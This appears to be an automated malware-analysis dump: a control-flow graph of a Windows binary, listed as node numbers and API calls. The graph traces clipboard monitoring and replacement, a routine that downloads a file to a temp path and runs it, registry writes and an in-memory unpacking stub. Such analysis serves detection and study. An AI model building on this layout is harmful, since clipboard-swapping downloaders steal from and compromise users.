EnterCriticalSection 65239->65282 65241 439791 65242 4397b6 65241->65242 65247 439824 EnterCriticalSection 65241->65247 65248 4397d8 65241->65248 65286 43955d 21 API calls 3 library calls 65242->65286 65245 439801 __wsopen_s 65245->65166 65246 4397bb 65246->65248 65287 4396a4 EnterCriticalSection 65246->65287 65247->65248 65249 439831 LeaveCriticalSection 65247->65249 65283 439887 65248->65283 65249->65241 65251->65177 65252->65182 65253->65197 65254->65172 65255->65182 65256->65185 65257->65182 65258->65183 65259->65190 65260->65187 65261->65189 65262->65193 65263->65205 65264->65200 65265->65203 65266->65205 65270 43cd47 65267->65270 65268 43cd62 65268->65227 65270->65268 65280 42eac9 20 API calls __dosmaperr 65270->65280 65271 43cd86 65281 42a59d 26 API calls _Deallocate 65271->65281 65273 43cd91 65273->65227 65274->65225 65275->65222 65276->65233 65277->65228 65278->65232 65279->65237 65280->65271 65281->65273 65282->65241 65288 42e435 LeaveCriticalSection 65283->65288 65285 43988e 65285->65245 65286->65246 65287->65248 65288->65285 65289->65210 65290 94003c 65291 940049 65290->65291 65305 940e0f SetErrorMode SetErrorMode 65291->65305 65296 940265 65297 9402ce VirtualProtect 65296->65297 65299 94030b 65297->65299 65298 940439 VirtualFree 65303 9405f4 LoadLibraryA 65298->65303 65304 9404be 65298->65304 65299->65298 65300 9404e3 LoadLibraryA 65300->65304 65302 9408c7 65303->65302 65304->65300 65304->65303 65306 940223 65305->65306 65307 940d90 65306->65307 65308 940dad 65307->65308 65309 940238 VirtualAlloc 65308->65309 65310 940dbb GetPEB 65308->65310 65309->65296 65310->65309 65311 43410a 65312 434116 BuildCatchObjectHelperInternal 65311->65312 65313 434122 65312->65313 65314 434139 65312->65314 65345 42eac9 20 API calls __dosmaperr 65313->65345 65324 42caff EnterCriticalSection 65314->65324 65317 434127 65346 42a59d 26 API calls _Deallocate 65317->65346 65318 434149 65325 434186 65318->65325 65321 434155 65347 43417c LeaveCriticalSection __fread_nolock 65321->65347 65323 434132 __wsopen_s 65324->65318 65326 434194 65325->65326 65327 4341ae 65325->65327 65358 42eac9 20 API calls __dosmaperr 65326->65358 65348 432908 65327->65348 65330 434199 65359 42a59d 26 API calls _Deallocate 65330->65359 65331 4341b7 65355 4347d3 65331->65355 65335 4342bb 65337 4342c8 65335->65337 65341 43426e 65335->65341 65336 43423f 65338 43425c 65336->65338 65336->65341 65361 42eac9 20 API calls __dosmaperr 65337->65361 65360 43449f 31 API calls 4 library calls 65338->65360 65342 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65341->65342 65362 43431b 30 API calls 2 library calls 65341->65362 65342->65321 65343 434266 65343->65342 65345->65317 65346->65323 65347->65323 65349 432914 65348->65349 65350 432929 65348->65350 65363 42eac9 20 API calls __dosmaperr 65349->65363 65350->65331 65352 432919 65364 42a59d 26 API calls _Deallocate 65352->65364 65354 432924 65354->65331 65365 434650 65355->65365 65357 4341d3 65357->65335 65357->65336 65357->65342 65358->65330 65359->65342 65360->65343 65361->65342 65362->65342 65363->65352 65364->65354 65366 43465c BuildCatchObjectHelperInternal 65365->65366 65367 434664 65366->65367 65372 43467c 65366->65372 65400 42eab6 20 API calls __dosmaperr 65367->65400 65369 434730 65405 42eab6 20 API calls __dosmaperr 65369->65405 65370 434669 65401 42eac9 20 API calls __dosmaperr 65370->65401 65372->65369 65375 4346b4 65372->65375 65374 434735 65406 42eac9 20 API calls __dosmaperr 65374->65406 65390 4396a4 EnterCriticalSection 65375->65390 65378 43473d 65407 42a59d 26 API calls _Deallocate 65378->65407 65379 4346ba 65381 4346f3 65379->65381 65382 4346de 65379->65382 65391 434755 65381->65391 65402 42eac9 20 API calls __dosmaperr 65382->65402 65385 434671 __wsopen_s 65385->65357 65386 4346ee 65404 434728 LeaveCriticalSection __wsopen_s 65386->65404 65387 4346e3 65403 42eab6 20 API calls __dosmaperr 65387->65403 65390->65379 65408 439921 65391->65408 65393 434767 65394 434780 SetFilePointerEx 65393->65394 65395 43476f 65393->65395 65397 434798 GetLastError 65394->65397 65399 434774 65394->65399 65421 42eac9 20 API calls __dosmaperr 65395->65421 65422 42ea93 20 API calls 3 library calls 65397->65422 65399->65386 65400->65370 65401->65385 65402->65387 65403->65386 65404->65385 65405->65374 65406->65378 65407->65385 65409 439943 65408->65409 65410 43992e 65408->65410 65415 439968 65409->65415 65425 42eab6 20 API calls __dosmaperr 65409->65425 65423 42eab6 20 API calls __dosmaperr 65410->65423 65412 439933 65424 42eac9 20 API calls __dosmaperr 65412->65424 65415->65393 65416 439973 65426 42eac9 20 API calls __dosmaperr 65416->65426 65418 43997b 65427 42a59d 26 API calls _Deallocate 65418->65427 65419 43993b 65419->65393 65421->65399 65422->65399 65423->65412 65424->65419 65425->65416 65426->65418 65427->65419 65428 4332de 65429 433303 65428->65429 65430 4332eb 65428->65430 65434 43335e 65429->65434 65442 4332fb 65429->65442 65480 434ccd 21 API calls 2 library calls 65429->65480 65478 42eac9 20 API calls __dosmaperr 65430->65478 65432 4332f0 65479 42a59d 26 API calls _Deallocate 65432->65479 65435 432908 __fread_nolock 26 API calls 65434->65435 65437 433376 65435->65437 65448 432e16 65437->65448 65439 43337d 65440 432908 __fread_nolock 26 API calls 65439->65440 65439->65442 65441 4333a9 65440->65441 65441->65442 65443 432908 __fread_nolock 26 API calls 65441->65443 65444 4333b7 65443->65444 65444->65442 65445 432908 __fread_nolock 26 API calls 65444->65445 65446 4333c7 65445->65446 65447 432908 __fread_nolock 26 API calls 65446->65447 65447->65442 65449 432e22 BuildCatchObjectHelperInternal 65448->65449 65450 432e42 65449->65450 65451 432e2a 65449->65451 65453 432f08 65450->65453 65458 432e7b 65450->65458 65547 42eab6 20 API calls __dosmaperr 65451->65547 65554 42eab6 20 API calls __dosmaperr 65453->65554 65455 432e2f 65548 42eac9 20 API calls __dosmaperr 65455->65548 65456 432f0d 65555 42eac9 20 API calls __dosmaperr 65456->65555 65461 432e8a 65458->65461 65462 432e9f 65458->65462 65460 432e37 __wsopen_s 65460->65439 65549 42eab6 20 API calls __dosmaperr 65461->65549 65481 4396a4 EnterCriticalSection 65462->65481 65464 432e97 65556 42a59d 26 API calls _Deallocate 65464->65556 65466 432e8f 65550 42eac9 20 API calls __dosmaperr 65466->65550 65467 432ea5 65469 432ec1 65467->65469 65470 432ed6 65467->65470 65551 42eac9 20 API calls __dosmaperr 65469->65551 65482 432f29 65470->65482 65474 432ec6 65552 42eab6 20 API calls __dosmaperr 65474->65552 65475 432ed1 65553 432f00 LeaveCriticalSection __wsopen_s 65475->65553 65478->65432 65479->65442 65480->65434 65481->65467 65483 432f53 65482->65483 65484 432f3b 65482->65484 65486 4332bd 65483->65486 65491 432f98 65483->65491 65566 42eab6 20 API calls __dosmaperr 65484->65566 65584 42eab6 20 API calls __dosmaperr 65486->65584 65487 432f40 65567 42eac9 20 API calls __dosmaperr 65487->65567 65490 4332c2 65585 42eac9 20 API calls __dosmaperr 65490->65585 65493 432fa3 65491->65493 65496 432f48 65491->65496 65498 432fd3 65491->65498 65568 42eab6 20 API calls __dosmaperr 65493->65568 65494 432fb0 65586 42a59d 26 API calls _Deallocate 65494->65586 65496->65475 65497 432fa8 65569 42eac9 20 API calls __dosmaperr 65497->65569 65501 432fec 65498->65501 65502 433012 65498->65502 65503 43302e 65498->65503 65501->65502 65507 432ff9 65501->65507 65570 42eab6 20 API calls __dosmaperr 65502->65570 65573 4336a7 21 API calls 3 library calls 65503->65573 65506 433017 65571 42eac9 20 API calls __dosmaperr 65506->65571 65557 43d365 65507->65557 65508 433045 65511 43346a _free 20 API calls 65508->65511 65514 43304e 65511->65514 65512 43301e 65572 42a59d 26 API calls _Deallocate 65512->65572 65513 433197 65516 43320d 65513->65516 65519 4331b0 GetConsoleMode 65513->65519 65517 43346a _free 20 API calls 65514->65517 65518 433211 ReadFile 65516->65518 65520 433055 65517->65520 65521 433285 GetLastError 65518->65521 65522 43322b 65518->65522 65519->65516 65523 4331c1 65519->65523 65524 43307a 65520->65524 65525 43305f 65520->65525 65526 433292 65521->65526 65527 4331e9 65521->65527 65522->65521 65528 433202 65522->65528 65523->65518 65529 4331c7 ReadConsoleW 65523->65529 65576 4347ee 65524->65576 65574 42eac9 20 API calls __dosmaperr 65525->65574 65582 42eac9 20 API calls __dosmaperr 65526->65582 65544 433029 __fread_nolock 65527->65544 65579 42ea93 20 API calls 3 library calls 65527->65579 65540 433250 65528->65540 65541 433267 65528->65541 65528->65544 65529->65528 65534 4331e3 GetLastError 65529->65534 65530 43346a _free 20 API calls 65530->65496 65534->65527 65536 433064 65575 42eab6 20 API calls __dosmaperr 65536->65575 65537 433297 65583 42eab6 20 API calls __dosmaperr 65537->65583 65580 432c45 31 API calls 3 library calls 65540->65580 65542 43327e 65541->65542 65541->65544 65581 432a85 29 API calls __fread_nolock 65542->65581 65544->65530 65546 433283 65546->65544 65547->65455 65548->65460 65549->65466 65550->65464 65551->65474 65552->65475 65553->65460 65554->65456 65555->65464 65556->65460 65558 43d372 65557->65558 65559 43d37f 65557->65559 65587 42eac9 20 API calls __dosmaperr 65558->65587 65562 43d38b 65559->65562 65588 42eac9 20 API calls __dosmaperr 65559->65588 65561 43d377 65561->65513 65562->65513 65564 43d3ac 65589 42a59d 26 API calls _Deallocate 65564->65589 65566->65487 65567->65496 65568->65497 65569->65494 65570->65506 65571->65512 65572->65544 65573->65508 65574->65536 65575->65544 65577 434755 __fread_nolock 28 API calls 65576->65577 65578 434804 65577->65578 65578->65507 65579->65544 65580->65544 65581->65546 65582->65537 65583->65544 65584->65490 65585->65494 65586->65496 65587->65561 65588->65564 65589->65561 65590 402bad RegCreateKeyExW 65591 402bdb RegSetValueExW 65590->65591 65592 402bef 65590->65592 65591->65592 65593 402bf4 RegCloseKey 65592->65593 65594 402bfd 65592->65594 65593->65594 65595 404b8e 65596 404b9a Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65595->65596 65601 40fb0c 65596->65601 65600 404bba Hash Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65603 40fb11 65601->65603 65604 404ba3 65603->65604 65606 40fb2d Mailbox 65603->65606 65625 42ad7e 65603->65625 65632 42f450 7 API calls 2 library calls 65603->65632 65609 4051d0 65604->65609 65633 42860d RaiseException 65606->65633 65608 4103cc 65610 4051dc Concurrency::details::ScheduleGroupBase::ScheduleGroupBase __Cnd_init 65609->65610 65612 4051f4 __Mtx_init 65610->65612 65644 40ce32 28 API calls std::_Throw_Cpp_error 65610->65644 65613 40521b 65612->65613 65645 40ce32 28 API calls std::_Throw_Cpp_error 65612->65645 65636 4010ea 65613->65636 65619 40526a 65621 40527f Hash 65619->65621 65647 401128 30 API calls 2 library calls 65619->65647 65648 401109 65621->65648 65624 4052a4 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65624->65600 65630 4336a7 std::_Locinfo::_Locinfo_dtor 65625->65630 65626 4336e5 65635 42eac9 20 API calls __dosmaperr 65626->65635 65628 4336d0 RtlAllocateHeap 65629 4336e3 65628->65629 65628->65630 65629->65603 65630->65626 65630->65628 65634 42f450 7 API calls 2 library calls 65630->65634 65632->65603 65633->65608 65634->65630 65635->65629 65652 40d313 65636->65652 65639 401103 65641 40cef3 65639->65641 65676 42e114 65641->65676 65644->65612 65645->65613 65646 40ce32 28 API calls std::_Throw_Cpp_error 65646->65619 65647->65619 65650 401115 __Mtx_unlock 65648->65650 65649 401122 65649->65624 65650->65649 66126 40ce32 28 API calls std::_Throw_Cpp_error 65650->66126 65656 40d06d 65652->65656 65655 40ce32 28 API calls std::_Throw_Cpp_error 65655->65639 65657 40d0c3 65656->65657 65658 40d095 GetCurrentThreadId 65656->65658 65659 40d0c7 GetCurrentThreadId 65657->65659 65660 40d0ed 65657->65660 65661 40d0a0 GetCurrentThreadId 65658->65661 65662 40d0bb 65658->65662 65670 40d0d6 65659->65670 65663 40d186 GetCurrentThreadId 65660->65663 65666 40d10d 65660->65666 65661->65662 65665 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65662->65665 65663->65670 65664 40d1dd GetCurrentThreadId 65664->65662 65669 4010f6 65665->65669 65674 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65666->65674 65669->65639 65669->65655 65670->65662 65670->65664 65671 40d145 GetCurrentThreadId 65671->65670 65672 40d118 __Xtime_diff_to_millis2 65671->65672 65672->65662 65672->65670 65672->65671 65675 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65672->65675 65674->65672 65675->65672 65677 42e121 65676->65677 65678 42e135 65676->65678 65699 42eac9 20 API calls __dosmaperr 65677->65699 65690 42e0cb 65678->65690 65682 42e126 65700 42a59d 26 API calls _Deallocate 65682->65700 65683 42e14a CreateThread 65685 42e169 GetLastError 65683->65685 65688 42e175 65683->65688 65721 42dfc0 65683->65721 65701 42ea93 20 API calls 3 library calls 65685->65701 65702 42e03d 65688->65702 65689 405257 65689->65619 65689->65646 65710 434d2a 65690->65710 65693 43346a _free 20 API calls 65694 42e0e4 65693->65694 65695 42e103 65694->65695 65696 42e0eb GetModuleHandleExW 65694->65696 65697 42e03d __Thrd_start 22 API calls 65695->65697 65696->65695 65698 42e10d 65697->65698 65698->65683 65698->65688 65699->65682 65700->65689 65701->65688 65703 42e04a 65702->65703 65704 42e06e 65702->65704 65705 42e050 CloseHandle 65703->65705 65706 42e059 65703->65706 65704->65689 65705->65706 65707 42e068 65706->65707 65708 42e05f FreeLibrary 65706->65708 65709 43346a _free 20 API calls 65707->65709 65708->65707 65709->65704 65711 434d37 65710->65711 65712 434d77 65711->65712 65713 434d62 HeapAlloc 65711->65713 65717 434d4b std::_Locinfo::_Locinfo_dtor 65711->65717 65720 42eac9 20 API calls __dosmaperr 65712->65720 65714 434d75 65713->65714 65713->65717 65716 42e0db 65714->65716 65716->65693 65717->65712 65717->65713 65719 42f450 7 API calls 2 library calls 65717->65719 65719->65717 65720->65716 65722 42dfcc _Atexit 65721->65722 65723 42dfd3 GetLastError ExitThread 65722->65723 65724 42dfe0 65722->65724 65737 431eda GetLastError 65724->65737 65726 42dfe5 65757 435571 65726->65757 65729 42dffb 65764 401169 65729->65764 65738 431ef0 65737->65738 65739 431ef6 65737->65739 65772 435111 11 API calls 2 library calls 65738->65772 65741 434d2a __dosmaperr 20 API calls 65739->65741 65743 431f45 SetLastError 65739->65743 65742 431f08 65741->65742 65744 431f10 65742->65744 65773 435167 11 API calls 2 library calls 65742->65773 65743->65726 65746 43346a _free 20 API calls 65744->65746 65748 431f16 65746->65748 65747 431f25 65747->65744 65749 431f2c 65747->65749 65750 431f51 SetLastError 65748->65750 65774 431d4c 20 API calls __dosmaperr 65749->65774 65775 42df7d 167 API calls 2 library calls 65750->65775 65753 431f37 65754 43346a _free 20 API calls 65753->65754 65756 431f3e 65754->65756 65755 431f5d 65756->65743 65756->65750 65758 435596 65757->65758 65759 43558c 65757->65759 65776 434e93 5 API calls 2 library calls 65758->65776 65761 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65759->65761 65763 42dff0 65761->65763 65762 4355ad 65762->65759 65763->65729 65771 4354a4 10 API calls 2 library calls 65763->65771 65777 40155a Sleep 65764->65777 65779 405800 65764->65779 65765 401173 65768 42e199 65765->65768 66094 42e074 65768->66094 65770 42e1a6 65771->65729 65772->65739 65773->65747 65774->65753 65775->65755 65776->65762 65778 4016d5 65777->65778 65780 40580c Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65779->65780 65781 4010ea std::_Cnd_initX 35 API calls 65780->65781 65782 405821 __Cnd_signal 65781->65782 65783 405839 65782->65783 65835 40ce32 28 API calls std::_Throw_Cpp_error 65782->65835 65785 401109 std::_Cnd_initX 28 API calls 65783->65785 65786 405842 65785->65786 65792 4016df 65786->65792 65812 4029f4 InternetOpenW 65786->65812 65789 405849 Hash Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65789->65765 65836 40fde6 65792->65836 65794 4016eb Sleep 65837 40cc10 65794->65837 65797 40cc10 28 API calls 65798 401711 65797->65798 65799 40171b OpenClipboard 65798->65799 65800 401943 Sleep 65799->65800 65801 40172b GetClipboardData 65799->65801 65800->65799 65802 40173b GlobalLock 65801->65802 65803 40193d CloseClipboard 65801->65803 65802->65803 65810 401748 __Strxfrm _strlen 65802->65810 65803->65800 65804 40cbc7 28 API calls std::system_error::system_error 65804->65810 65805 40cc10 28 API calls 65805->65810 65807 4018d2 EmptyClipboard GlobalAlloc 65808 4018eb GlobalLock 65807->65808 65807->65810 65808->65810 65810->65803 65810->65804 65810->65805 65810->65807 65811 401905 GlobalUnlock SetClipboardData GlobalFree 65810->65811 65841 402e66 65810->65841 65859 40caa6 26 API calls _Deallocate 65810->65859 65811->65810 65813 402a27 InternetOpenUrlW 65812->65813 65814 402b9c 65812->65814 65813->65814 65815 402a3d GetTempPathW GetTempFileNameW 65813->65815 65817 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65814->65817 65975 42a88e 65815->65975 65819 402bab 65817->65819 65828 40e76b 65819->65828 65820 402b8b InternetCloseHandle InternetCloseHandle 65820->65814 65821 402aa8 Hash 65822 402ac0 InternetReadFile WriteFile 65821->65822 65823 402b00 CloseHandle 65821->65823 65822->65821 65977 402960 65823->65977 65826 402b2b ShellExecuteExW 65826->65820 65827 402b72 WaitForSingleObject CloseHandle 65826->65827 65827->65820 66085 40deea 65828->66085 65833 40e810 65833->65789 65834 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 66092 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65834->66092 65835->65783 65836->65794 65838 40cc2c _strlen 65837->65838 65860 40cbc7 65838->65860 65840 401704 65840->65797 65842 402e72 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65841->65842 65865 403176 65842->65865 65844 402ec4 65879 404bf4 65844->65879 65846 402edc 65847 403176 167 API calls 65846->65847 65858 402ee1 std::ios_base::_Ios_base_dtor Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65846->65858 65848 402f2b 65847->65848 65849 404bf4 28 API calls 65848->65849 65850 402f43 65849->65850 65851 403176 167 API calls 65850->65851 65850->65858 65852 402fb3 65851->65852 65853 404bf4 28 API calls 65852->65853 65854 402fcb 65853->65854 65855 403176 167 API calls 65854->65855 65854->65858 65856 403048 65855->65856 65857 404bf4 28 API calls 65856->65857 65857->65858 65858->65810 65859->65810 65861 40cbfa 65860->65861 65862 40cbd6 BuildCatchObjectHelperInternal 65860->65862 65861->65862 65864 40cb5c 28 API calls 4 library calls 65861->65864 65862->65840 65864->65862 65866 403182 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65865->65866 65883 40db27 65866->65883 65868 40319e 65895 404d52 65868->65895 65870 4031af 65913 40c189 65870->65913 65872 4031b8 _strlen 65929 405398 65872->65929 65874 4031d9 65937 40544e 65874->65937 65876 4031e5 65951 404ffd 65876->65951 65878 403212 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65878->65844 65880 404c00 _strlen 65879->65880 65955 4052b9 65880->65955 65882 404c0e 65882->65846 65884 40db33 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65883->65884 65885 40de73 std::_Lockit::_Lockit EnterCriticalSection EnterCriticalSection 65884->65885 65886 40db3e 65885->65886 65887 40dc93 std::locale::_Init 22 API calls 65886->65887 65894 40db6f 65886->65894 65889 40db51 65887->65889 65888 40decb std::_Lockit::~_Lockit LeaveCriticalSection LeaveCriticalSection 65890 40dbaf Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65888->65890 65891 40dcb6 std::locale::_Setgloballocale 167 API calls 65889->65891 65890->65868 65892 40db59 65891->65892 65893 40da7f _Yarn 21 API calls 65892->65893 65893->65894 65894->65888 65896 404d5e Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65895->65896 65897 40de73 std::_Lockit::_Lockit EnterCriticalSection EnterCriticalSection 65896->65897 65898 404d68 65897->65898 65899 40bd5c int EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 65898->65899 65901 404d7f std::locale::_Getfacet 65899->65901 65900 404d92 65902 40decb std::_Lockit::~_Lockit LeaveCriticalSection LeaveCriticalSection 65900->65902 65901->65900 65903 404e63 167 API calls 65901->65903 65904 404dcf Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65902->65904 65905 404da2 65903->65905 65904->65870 65906 404dd7 65905->65906 65907 404da9 65905->65907 65909 42860d __CxxThrowException@8 RaiseException 65906->65909 65908 40daf5 std::_Facet_Register 22 API calls 65907->65908 65908->65900 65910 404ded 65909->65910 65911 405015 65910->65911 65912 40cc96 _Deallocate 26 API calls 65910->65912 65911->65870 65912->65911 65914 40c195 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65913->65914 65915 40de73 std::_Lockit::_Lockit EnterCriticalSection EnterCriticalSection 65914->65915 65916 40c19f 65915->65916 65917 40bd5c int EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 65916->65917 65918 40c1b6 std::locale::_Getfacet 65917->65918 65919 40c1c9 65918->65919 65921 40c0b4 167 API calls 65918->65921 65920 40decb std::_Lockit::~_Lockit LeaveCriticalSection LeaveCriticalSection 65919->65920 65922 40c206 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65920->65922 65923 40c1d9 65921->65923 65922->65872 65924 40c1e0 65923->65924 65925 40c20e 65923->65925 65926 40daf5 std::_Facet_Register 22 API calls 65924->65926 65927 42860d __CxxThrowException@8 RaiseException 65925->65927 65926->65919 65928 40c224 65927->65928 65930 4053a4 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65929->65930 65931 405a0f 28 API calls 65930->65931 65932 4053d5 65931->65932 65933 4059a6 28 API calls 65932->65933 65934 4053e3 65933->65934 65935 40fb0c Mailbox 22 API calls 65934->65935 65936 4053f0 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65935->65936 65936->65874 65938 40545a __EH_prolog3_catch 65937->65938 65939 405d19 22 API calls 65938->65939 65940 40546f 65939->65940 65941 405bc7 30 API calls 65940->65941 65942 405479 65941->65942 65943 405480 65942->65943 65944 4054ca 65942->65944 65946 405cbb 22 API calls 65943->65946 65945 405aa0 28 API calls 65944->65945 65947 4054d1 65945->65947 65948 40548a 65946->65948 65949 406ad7 22 API calls 65948->65949 65950 405493 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65949->65950 65950->65876 65952 405005 65951->65952 65954 405015 65951->65954 65953 40cc96 _Deallocate 26 API calls 65952->65953 65953->65954 65954->65878 65956 4052c8 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65955->65956 65957 40575f 28 API calls 65956->65957 65960 4052d1 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65956->65960 65958 4052f3 65957->65958 65959 406372 28 API calls 65958->65959 65961 405313 65959->65961 65960->65882 65962 4078da 28 API calls 65961->65962 65963 405321 65962->65963 65964 4071ab 28 API calls 65963->65964 65965 405345 65964->65965 65967 40cc96 _Deallocate 26 API calls 65965->65967 65969 405360 65965->65969 65966 4058f9 26 API calls 65968 405375 65966->65968 65967->65969 65970 404ffd 26 API calls 65968->65970 65969->65966 65971 40537d 65970->65971 65972 4058f9 26 API calls 65971->65972 65973 405385 65972->65973 65974 404ffd 26 API calls 65973->65974 65974->65960 65976 402a76 CreateFileW 65975->65976 65976->65820 65976->65821 65978 40298b Hash _wcslen 65977->65978 65987 42b454 65978->65987 65983 4029b8 66009 404333 65983->66009 65985 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65986 4029f2 65985->65986 65986->65820 65986->65826 66013 42b106 65987->66013 65990 402823 65991 402832 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 65990->65991 66039 4032dd 65991->66039 65993 402846 66055 403b8b 65993->66055 65995 40285a 65996 402888 65995->65996 65997 40286c 65995->65997 66061 403112 65996->66061 66082 40329a 167 API calls 65997->66082 66000 402895 66064 403c20 66000->66064 66002 4028a7 66074 403cc2 66002->66074 66004 4028c4 66006 404333 26 API calls 66004->66006 66005 40287f std::ios_base::_Ios_base_dtor Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66005->65983 66007 4028e3 66006->66007 66083 40329a 167 API calls 66007->66083 66010 4029e4 66009->66010 66011 40433b 66009->66011 66010->65985 66084 40cc96 26 API calls 2 library calls 66011->66084 66014 42b133 66013->66014 66015 42b142 66014->66015 66016 42b15a 66014->66016 66028 42b137 66014->66028 66018 42eac9 __Wcscoll 20 API calls 66015->66018 66017 42a747 __fassign 162 API calls 66016->66017 66019 42b165 66017->66019 66021 42b147 66018->66021 66022 42b170 66019->66022 66023 42b307 66019->66023 66020 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 66024 4029a4 66020->66024 66025 42a59d __wsopen_s 26 API calls 66021->66025 66029 42b218 WideCharToMultiByte 66022->66029 66031 42b17b 66022->66031 66036 42b1b5 WideCharToMultiByte 66022->66036 66026 42b334 WideCharToMultiByte 66023->66026 66027 42b312 66023->66027 66024->65990 66025->66028 66026->66027 66027->66028 66030 42eac9 __Wcscoll 20 API calls 66027->66030 66028->66020 66029->66031 66032 42b243 66029->66032 66030->66028 66031->66028 66035 42eac9 __Wcscoll 20 API calls 66031->66035 66032->66031 66034 42b24c GetLastError 66032->66034 66034->66031 66038 42b25b 66034->66038 66035->66028 66036->66031 66037 42b274 WideCharToMultiByte 66037->66027 66037->66038 66038->66027 66038->66028 66038->66037 66040 4032e9 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66039->66040 66041 40467c 167 API calls 66040->66041 66042 403315 66041->66042 66043 40484d 167 API calls 66042->66043 66044 40333e 66043->66044 66045 40458c 26 API calls 66044->66045 66046 40334d 66045->66046 66047 403392 std::ios_base::_Ios_base_dtor 66046->66047 66048 40dde3 167 API calls 66046->66048 66049 4033ce Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66047->66049 66051 40c618 167 API calls 66047->66051 66050 403362 66048->66050 66049->65993 66050->66047 66052 40458c 26 API calls 66050->66052 66051->66049 66053 403373 66052->66053 66054 404c14 167 API calls 66053->66054 66054->66047 66056 403b97 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66055->66056 66057 4042af 167 API calls 66056->66057 66058 403ba3 66057->66058 66059 403bc7 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66058->66059 66060 4034fb 167 API calls 66058->66060 66059->65995 66060->66059 66062 404356 28 API calls 66061->66062 66063 40312c Hash 66062->66063 66063->66000 66065 403c2c Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66064->66065 66066 40c618 167 API calls 66065->66066 66067 403c4f 66066->66067 66068 4042af 167 API calls 66067->66068 66069 403c59 66068->66069 66071 403c9c Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66069->66071 66073 4034fb 167 API calls 66069->66073 66070 403c7a 66070->66071 66072 4046ca 167 API calls 66070->66072 66071->66002 66072->66071 66073->66070 66075 403cce __EH_prolog3_catch 66074->66075 66076 4042af 167 API calls 66075->66076 66079 403ce7 66076->66079 66077 403d17 66078 4046ca 167 API calls 66077->66078 66080 403d70 Concurrency::details::ScheduleGroupBase::ScheduleGroupBase 66078->66080 66079->66077 66081 40369f 40 API calls 66079->66081 66080->66004 66081->66077 66082->66005 66083->66005 66084->66010 66093 40f22a EnterCriticalSection 66085->66093 66087 40def4 66088 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 66087->66088 66089 40ced2 66088->66089 66090 40cec7 CloseHandle 66088->66090 66091 40ced6 GetCurrentThreadId 66089->66091 66090->66091 66091->65834 66092->65833 66093->66087 66103 431f5e GetLastError 66094->66103 66096 42e083 ExitThread 66097 42e0a1 66100 42e0b4 66097->66100 66101 42e0ad CloseHandle 66097->66101 66100->66096 66102 42e0c0 FreeLibraryAndExitThread 66100->66102 66101->66100 66104 431f7d 66103->66104 66105 431f77 66103->66105 66107 434d2a __dosmaperr 17 API calls 66104->66107 66109 431fd4 SetLastError 66104->66109 66123 435111 11 API calls 2 library calls 66105->66123 66108 431f8f 66107->66108 66110 431f97 66108->66110 66124 435167 11 API calls 2 library calls 66108->66124 66112 42e07f 66109->66112 66113 43346a _free 17 API calls 66110->66113 66112->66096 66112->66097 66122 4354f6 10 API calls 2 library calls 66112->66122 66115 431f9d 66113->66115 66114 431fac 66114->66110 66116 431fb3 66114->66116 66117 431fcb SetLastError 66115->66117 66125 431d4c 20 API calls __dosmaperr 66116->66125 66117->66112 66119 431fbe 66120 43346a _free 17 API calls 66119->66120 66121 431fc4 66120->66121 66121->66109 66121->66117 66122->66097 66123->66104 66124->66114 66125->66119 66126->65649 66127 40239e 66128 402561 PostQuitMessage 66127->66128 66129 4023b2 66127->66129 66130 40255f 66128->66130 66131 4023b9 DefWindowProcW 66129->66131 66132 4023d0 66129->66132 66131->66130 66132->66130 66133 4029f4 167 API calls 66132->66133 66133->66130

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                  • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                • _strlen.LIBCMT ref: 00401749
                                                                                                • _strlen.LIBCMT ref: 00401778
                                                                                                • _strlen.LIBCMT ref: 004018BC
